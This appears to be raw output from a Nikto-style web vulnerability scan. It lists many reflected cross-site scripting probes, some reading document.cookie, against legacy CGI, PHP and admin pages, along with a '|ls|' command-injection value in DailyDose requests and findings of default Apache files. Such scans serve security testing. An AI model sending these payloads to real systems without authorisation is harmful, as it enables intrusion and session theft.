+ OSVDB-0: GET /cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05 : DCP-Portal v5.3.1 is vulnerable to  Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script> : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /bb000001.pl<script>alert('Vulnerable')</script> : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /article.cfm?id=1'<script>alert(document.cookie);</script> : With malformed URLS, Coldfusion is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script> : Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /addressbook/index.php?surname=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /addressbook/index.php?name=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script> :  1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /a?<script>alert('Vulnerable')</script> : Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.
+ OSVDB-0: GET /a.jsp/<script>alert('Vulnerable')</script> : JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.thtml : Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.shtml : Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.jsp : Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.aspx : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /%0a%0a<script>alert(\"Vulnerable\")</script>.jsp : Jetty jsp servlet engine is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-sys/Count.cgi : This may allow attackers to execute arbitrary commands on the server
+ OSVDB-6662: GET /<script>alert('Vulnerable')</script> : Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-16207: GET /mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com : IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3233: GET /mailman/listinfo : Mailman was found on the server.
+ OSVDB-25499: GET /affich.php?image=<script>alert(document.cookie)</script> : GPhotos index.php rep Variable XSS.
+ OSVDB-25498: GET /diapo.php?rep=<script>alert(document.cookie)</script> : GPhotos index.php rep Variable XSS.
+ OSVDB-700: GET /fcgi-bin/echo?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3954: GET /fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-700: GET /fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3954: GET /fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-14633: GET /ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>  : Sun Answerbook is vulnerable to XSS in the search field.
+ OSVDB-19947: GET /apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script> : Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-12607: GET /forgot_password.php?email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12606: GET /bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12607: GET /bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12606: GET /eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12607: GET /eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-2562: GET /login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2617: GET /acart2_0/signin.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-2799: GET /cgi.cgi/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /webcgi/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /cgi-914/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /cgi-915/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /bin/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /cgi/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /mpcgi/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /cgi-bin/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /ows-bin/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /cgi-sys/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /cgi-local/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /htbin/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /cgibin/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /cgis/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /scripts/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /cgi-win/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /fcgi-bin/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /cgi-exe/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /cgi-home/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2799: GET /cgi-perl/dose.pl?daily&somefile.txt&|ls| : DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
+ OSVDB-2921: GET /shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script> : VP-ASP prior to 4.50 are vulnerable to XSS attacks
+ OSVDB-3092: GET /cgi-sys/entropysearch.cgi : Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: GET /cgi-sys/FormMail-clone.cgi : Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: GET /cgi-sys/mchat.cgi : Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: GET /cgi-sys/scgiwrap : Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: GET /img-sys/ : Default image directory should not allow directory listing.
+ OSVDB-3092: GET /java-sys/ : Default Java directory should not allow directory listing.
+ OSVDB-3092: GET /manual/ : Web server manual found.
+ OSVDB-3233: GET /index.html.ca : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.de : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.dk : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.ee : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.el : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.en : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.es : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.fr : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.he.iso8859-8 : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.it : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.nl : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.nn : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.no : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.pt : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.pt-br : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.ru.cp-1251 : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.ru.cp866 : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.ru.iso-ru : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.ru.koi8-r : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.ru.utf8 : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: GET /index.html.se : Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons
+ OSVDB-3268: GET /manual/images/ : Directory indexing is enabled: /manual/images
+ OSVDB-3280: GET /forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script> : Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3289: GET /firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3294: GET /firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script> : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3295: GET /antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0 : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3295: GET /antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally) : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3417: GET /examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script> : BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example code. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0624. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3458: GET /sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script> : Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0375. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3483: GET /docs/<script>alert('Vulnerable');</script> : Nokia Electronic Documentation is vulneable to Cross Site Scripting (XSS). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0801.
+ OSVDB-3486: GET /aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script> : Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1212, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3632: GET /webcalendar/colors.php?color=</script><script>alert(document.cookie)</script> : Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3633: GET /webcalendar/week.php?user=\"><script>alert(document.cookie)</script> : Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3762: GET /debug/dbg?host==<script>alert('Vulnerable');</script> : The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3762: GET /debug/echo?name=<script>alert('Vulnerable');</script> : The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3762: GET /debug/errorInfo?title===<script>alert('Vulnerable');</script> : The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3762: GET /debug/showproc?proc===<script>alert('Vulnerable');</script> : The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.
+ OSVDB-4262: GET /addressbook.php?\"><script>alert(Vulnerable)</script><!-- : Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4265: GET /help.php?chapter=<script>alert('Vulnerable')</script> : Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4356: GET /acart2_0/deliver.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4357: GET /acart2_0/error.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4358: GET /acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4359: GET /acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-5097: GET /wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5098: GET /sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5099: GET /sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5099: GET /sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5099: GET /sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5099: GET /sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5099: GET /sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5099: GET /sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5099: GET /sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5099: GET /sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5099: GET /sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /cgi.cgi/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /webcgi/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /cgi-914/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /cgi-915/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /bin/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /cgi/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /mpcgi/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /ows-bin/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /cgi-local/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /htbin/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /cgibin/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /cgis/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /scripts/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /cgi-win/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /fcgi-bin/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /cgi-exe/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /cgi-home/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5100: GET /cgi-perl/testcgi.exe?<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /cgi.cgi/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /webcgi/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /cgi-914/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /cgi-915/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /bin/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /cgi/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /mpcgi/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /ows-bin/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /cgi-local/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /htbin/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
